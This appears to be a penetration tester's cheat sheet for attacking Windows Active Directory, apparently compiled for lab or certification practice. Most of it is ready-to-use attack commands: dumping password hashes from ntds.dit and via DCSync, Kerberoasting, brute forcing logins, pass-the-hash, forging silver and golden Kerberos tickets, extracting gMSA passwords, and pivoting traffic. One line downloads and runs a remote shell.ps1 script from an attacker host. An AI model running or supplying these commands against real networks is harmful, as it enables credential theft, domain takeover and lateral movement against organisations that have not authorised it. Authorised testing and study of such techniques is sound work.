Used when clients authenticate to a server by IP (instead of hostname) or if a user attempts to authenticate to a hostname that is not registered on the AD DNS server. 3rd party applications can also choose NTLM instead of Kerberos.
NTLM hashes can be cracked very quickly

Kerberos

ntds.dit file

Database stored on DC that contains all active directory information including password hashes for all users in the domain
C:\windows\ntds\
Can use SYSTEM file to decrypt the ntds.dit and extract all the information from it

impacket-secretsdump -ntds <ntds.dit file> -system <SYSTEM file> [-security <SECURITY file>] LOCAL

Additional Useful flags:

-pwd-last-set	If user has multiple accounts and changes password in same timeframe then likey all passwords are the same
-user-status	Tells if the account is disabled or not
-history	Windows will show the last 24 used passwords for each user

Grep the ntds dump

grep -v 'aes[12]\|des-cbc
grep -v history0

Brute force valid users amd pre-auth attack

kerbrute

pre-auth attack tool. Will validate user existence.
Can lock out users but will not generate 4625 event code which is logged by default. The event code it does generate is not logged by default.
kerberute userenum --dc apt -d <domain> <user list>

Kerberoast

Mimikatz/manual

Purge all current tickets	kerberos::purge
Enumerate SPNs	GetUserSPNs.ps1
Request security token for SPN	Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<SPN - Example:HTTP/CorpWebServer.corp.com>'
export TGS ticket	kereberos::list /export or PS > klist
Turn output into hashcat hash	kirbi2hashcat

Rubeus

.\r.exe kerberoast /creduser:domain\<user> /credpassword:<password>

impacket-GetUserSPNs

impacket-GetUserSPNs -dc-ip <dc ip> <domain name>/<user to request ticket as>:<password> -request-user <kerberoastable user>

GetUserSPNs.py if port 88 is inaccessible from kali machine

Forward port 88 & 389 to Kali	chisel.exe client 10.10.14.4:8008 R:88:127.0.0.1:88 R:389:localhost:389
Get hash for kerberoastable users	GetUserSPNs.py -request -dc-ip 127.0.0.1 <domain>/<user>

DCSync

Retrieve all domain password data via domain replication protocols.
Tools/Methods

Impacket-SecretsDump '<username>:<password>@<ip address>'

Attack remotely. Generates network traffic. Does not have to deal with AV or other problems on victim machine.

.\Mimikatz.exe 'lsadump::dcsync /domain:<domain name> /user:administrator' exit

Attack locally. Reduced network traffic.

Brute force credentials with smb and winrm

crackmapexec winrm/smb -u <username> -p <password> or -H <hash>

SMB brute forcing can be detected and banned by some AD setups

Enumerating AD Users and Groups

net user	Shows local user accounts
net user /domain	Shows all domain user accounts
net user <user> /domain	Shows all domain user accounts
net group /domain	Shows all groups on the domain

Fix clock skew

Check clock skew

nmap

sudo nmap -p445 -sV -sC <ip address>
Look for clock-skew: mean: <value> deviation: <clock skew time> median: <value>

ntpdate -q <server ip>

Check local time (on Kali)

date

Change local time (on Kali)

date -s <Time>

<Time> Format

HH:MM:SS

ntpdate <server ip>

Check domain

crackmapexec smb <ip>

Credential Usage

impacket-psexec

If user has ability to write to a SMB share

impacket-wmiexec uses same syntax

wmiexec does not require writing to SMB

impacket-psexec <username>@<ip address> -hashes LM:NTLM

impacket-psexec <username>:<password>@<ip address>

impacket-psexec <username>@<ip address>

Will prompt for password. Works when password has bad characters that are throwing off the command.

Run powershell command as other user

Method 1	Start-Process -FilePath "powershell" -argumentlist "IEX(New-Object Net.WebClient).downloadString('http://<ip address>/shell.ps1')" -Credential $cred
Method 2	Invoke-Command -ComputerName <computer name> -Credential $cred -ScriptBlock {whoami}
Method 3	Powershell-Suite/Runas.ps1 Invoke-RunAs -User <username> -Password <password> -LogonType <0x1 or 0x2> -Binary powershell.exe -Args <powershell command>

Pass the hash

pth-winexe - Pass the hash

Used to authenticate via the SMB protocol
Example: pth-winexe –U <username>%<hash - Must be formatted LM_Hash:NT_Hash> //<ip address> cmd

winexe - password

winexe -U '<username>%<password>' //<ip address> cmd.exe

winexe -U '<username>%<password>' --system //<ip address> cmd.exe

evil-winrm

evil-winrm -i <ip address> -u <user> -p <password>

evil-winrm -i <ip address> -u <user> -H <NTLM>

Forward winrm ports to localhost

.\chisel.exe client <local/chisel ip>:<chisel server port> R:5985:localhost:5985 R:5986:localhost:5986

Overpass the Hash

Turn NTLM hash into Kerberos ticket to avoid the use of NTLM authentication

Retrieve NTLM hash for user

Mimikatz

Privilege::debug
Sekurlsa::logonpasswords

Authenticate with NTLM hash – Powershell session under context of other user

Mimikatz

Sekurlsa::pth /user:<username> /domain:<domain – ex. Corp.com> /ntlm:<NTLM hash> /run:powershell.exe

Generate TGT by authenticating to a network share on DC – can use any command that requires domain permissions

Net use \\<Domain Controller – ex. dc01>

Check for cached Kerberos ticket

Klist

Run PsExec inside powershell session that is running under context of other user

.\PsExec.exe \\<domain controller – ex. dc01> cmd.exe

Silver Ticket

Forge TGS using a service account password or NTLM hash in order to access any resources that the service account has permissions to

If the SPN is used on multiple servers the ticket can be leveraged against them all.

Creation Instructions - With local shell

Get domain SID

Whoami /user

SID is everything except the last section of digits

mimikatz

Get rid of pre-existing kerberos tickets

Kerberos::purge

Verify Kerberos tickets are purged

Kerberos::list

Forge silver ticket

Kerberos::golden /user:<username> /domain:<domain ex. corp.com> /sid:<domain SID – whoami /user SID except last section of #'s> target:<fully qualified host name of service – ex. CorpWebServer.corp.com> /service:<service type – ex. HTTP> /rc4:<service account hash> /ppt (inject into memory)

Rc4/hash section requires knowledge of service account password. If password is known, we can hash it.

Verify ticket has been created

Kerberos::list

Creation Instructions - Remote

Get NTLM hash of SPN password	Might need to make sure it is lowercase
Get domain SID	impacket-getPac -targetUser <user (i.e. administrator)> <credentials> Use impacket-getPac against a user, the domain SID will be included in the output
Generate silver ticket	impacket-ticketer -domain <Domain> -domain-sid "<Domain SID>" -nthash "<SPN Password Hash>" -spn <SPN> <Username> Example: impacket-ticketer -domain scrm.local -domain-sid "S-1-5-21-2743207045-1827831105-2542523200" -nthash "B999A16500B87D17EC7F2E2A68778F05" -spn mssqlsvc/dc1.SCRM.local administrator

Golden Ticket

Gives access to anything and everything

Requires the password or hash for the service account krbtgt

Must have access to an account that is a member of the domain admins group or have access to the domain controller itself.

Creating the golden ticket does not require admin privileges and can be performed on a computer not joined to the domain.

Creating golden ticket on Linux

Get krbtgt hash

impacket-SecretsDump

Get domain SID

On Windows

PS > Get-ADDomain <Domain>

impacket-ticketer

impacket-ticketer -nthash <krbtgt ntlm hash> -domain-sid <domain sid> -domain <Domain Name> <Username>

export KRB5CCNAME=<output .cache file from impacket-ticketer command>
psexec <domain>/<username>@<ip address> -k -no-pass

Try adding domain names to /etc/host file before running

Try DNS names instead of ip address in command

psexec will always login as SYSTEM

switch to wmiexec to login as Administrator instead of SYSTEM

Creating the golden ticket on windows

Get domain SID & krbtgt hash

mimikatz: privilege::debug
mimikatz: lsadump::lsa /patch

Purge kerberos tickets

mimikatz: kerberos::purge

Create golden ticket

mimikatz: kerberos::golden /user:fakeuser /domain:corp.com /sid:s-1-5-<sid> /krbtgt:<krbtgt hash /ptt>

Launch new command prompt

misc::cmd

Attempt lateral movement with psexec

Psexec.exe \\<domain controller> cmd.exe

Read GMSA Password

$gmsa = Get-ADServiceAccount <GMSA Account> -Properties msDS-ManagedPassword

$mp = $gmsa.'msDS-ManagedPassword'

ConvertFrom-ADManagedPasswordBlob $mp

$pwd = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword

If 'CurrentPassword' shows a bunch of gibberish, then the password is 256 bytes of psuedorandom data interpreted as 128 UTF-16 characters.

Convert to NTLM hash: ConvertTo-NTHash $pwd

Setup Linux as a Router

Send all traffic from Linux to Windows and back

Usage example: Find a Windows application on the victim that communicates with a port on a victim machine. Run that program from an attacking Windows host but route the traffic through Kali.

Source: Ippsec, Sharp - https://www.youtube.com/watch?v=lxjAZELJ96Q

Forward traffic from one interface to another and vice versa

Check if ip forwarding is enabled

sudo sysctl -a | grep ip_for

net.ipv4.ip_forward = 1 = enabled
if net.ipv4.ip_forward = 0

sudo echo 1 > /proc/sys/net/ipv4/ip_forward

Linux Setup

Forward traffic from tun0 to eth0	sudo iptables -A FORWARD -i tun0 -o eth0 -m state --state RELATED,ESTABLISHED -j ACCEPT
Forward traffic from eth0 to tun0	sudo iptables -A FORWARD -i eth0 -o tun0 -j ACCEPT
Change source IP from eth0 back to tun0	sudo iptables -t nat -A POSTROUTING -s <eth0 CIDR range> -o tun0 -j MASQUERADE

Windows setup

Send traffic directed towards victim ip to linux ip

route add <victim ip> <linux ip>

Convert vbs file to one line

Remove comments	Find:'.* Replace:
Remove continuation lines	Find: _.*\n Replace:
Replace tabs	Find:\t Replace:
Replace newlines with :	Find:\n Replace::
Replace double :: with single :	Find::: Replace::